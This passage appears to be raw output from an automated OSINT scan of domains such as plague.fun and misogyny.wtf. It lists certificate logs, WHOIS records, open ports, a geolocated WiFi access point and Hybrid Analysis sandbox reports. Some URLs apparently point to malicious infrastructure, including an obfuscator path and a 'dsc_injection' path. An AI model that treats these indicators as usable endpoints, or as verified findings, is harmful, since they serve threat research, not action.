u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:58.165', u'id': 6305472947}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:57.451', u'id': 6305474316}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:28.385', u'id': 6305464280}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:27.978', u'id': 6305463915}, {u'not_after': u'2022-04-08T17:50:29', u'not_before': u'2022-01-08T17:50:30', u'issuer_ca_id': 183267, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.plague.fun', u'serial_number': u'045042ff9a7a0aecdb51557918dd8fed52b0', u'entry_timestamp': u'2022-01 2022-12-18 00:06:57 Open TCP Port No Pulsedive 0 0 2 0 None 34.149.204.188:80 34.149.204.188 2022-12-18 00:03:12 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.242 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 2WIRE623 (Net ID: 00:00:85:F5:03:9F) 37.7803446,-122.3906132 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": 
["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77ab5816ee75632a-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1 2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.101 90.116.166.104 2022-12-18 00:17:08 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 2 0 None amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None clumsydarkchords.88838.repl.co 34.149.204.188 2022-12-18 00:25:42 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-190.w90-116.abo.wanadoo.fr 90.116.149.190 2022-12-18 00:11:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.info Registry Domain ID: c6b55818519e49ffbd1c2a329f4bac56-DONUTS Registrar WHOIS Server: whois.godaddy.com/ Registrar URL: http://www.godaddy.com/domains/search.aspx?ci=8990 Updated Date: 2022-11-05T16:53:15Z Creation Date: 2001-09-21T16:52:34Z Registry Expiry Date: 2023-09-21T16:52:34Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant 
Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: mona.ns.cloudflare.com Name Server: mario.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. 
provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.info 2022-12-18 00:04:04 Raw Data from RIRs No Tool - WhatWeb 0 0 1 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://misogyny.wtf', u'http_status': 200, u'plugins': {u'Python': {u'version': [u'3.9.11']}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Werkzeug/2.2.2 Python/3.9.11']}, u'Werkzeug': {u'version': [u'2.2.2']}, u'IP': {u'string': [u'20.226.83.185']}}}, {}] misogyny.wtf 2022-12-18 00:09:02 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:12:35 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "IsoScope_b40_IE_EarlyTabStart_0xcc4_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_303"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.97.3:80"\n "104.18.31.78:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "63CJVUP7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n Dropped file: "LM0USI2F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n Dropped file: "T1YFWYTS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n Dropped file: "I9G9J455.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n Dropped file: "V5D4L4LK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "63CJVUP7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n "LM0USI2F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n "search_2_.json" has type "JSON data"- [targetUID: 
N/A]\n "RecoveryStore._5A1BB117-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF6DA808881895FA0D.TMP" has type "data"- Location: [%TEMP%\\~DF6DA808881895FA0D.TMP]- [targetUID: 00000000-00002880]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_62DCD38E-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "T1YFWYTS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002880]\n "_5A1BB119-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF6F835D267B734551.TMP" has type "data"- Location: [%TEMP%\\~DF6F835D267B734551.TMP]- [targetUID: 00000000-00002880]\n "~DF5D1A299F27A3DE5A.TMP" has type "data"- Location: [%TEMP%\\~DF5D1A299F27A3DE5A.TMP]- [targetUID: 00000000-00002880]\n "I9G9J455.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n "V5D4L4LK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF0964BBE9D2996453.TMP" has type "data"- Location: 
[%TEMP%\\~DF0964BBE9D2996453.TMP]- [targetUID: 00000000-00002880]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.97.3/"\n Pattern match: "http://188.114.97.3"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.97.3" found in string "http://188.114.97.3/"\n Potential IP "188.114.97.3" found in string "http://188.114.97.3"\n "188.114.97.3"\n Potential IP "188.114.97.3" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.97.3\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by 
at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'2/92 Antivirus vendors marked sample as malicious (2% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'6390e9ccb71c6170ee5b000d', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mit 188.114.97.3 2022-12-18 00:27:10 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.101:80 81.88.48.101 2022-12-18 00:07:05 HTTP Status Code No Web Spider 0 0 2 0 None None http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection" 2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.9 2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None United States +19854014545 2022-12-18 00:13:27 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None abuse@namecheap.com Domain Name: misogyny.wtf Registry Domain ID: 
6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:22:37 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.nl plague.fun 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun 2022-12-18 00:12:16 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3032::ac43:be81 2022-12-18 00:22:07 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.0 400 Bad Request 34.149.204.188 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None https://obf.plague.fun/obf/ plague.fun 2022-12-18 00:04:41 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'188.114.96.0'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.0/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"performance.radar.cloudflare.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, 
u'type': 7, u'description': u'"188.114.96.0:80"\n "104.18.30.78:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eec_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_eec_IESQMMUTEX_0_519"\n "IsoScope_eec_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_eec_ConnHashTable<3820>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3820"\n "IsoScope_eec_IESQMMUTEX_0_331"\n "IsoScope_eec_IE_EarlyTabStart_0xef0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_eec_ConnHashTable<3820>_HashTable_Mutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" 
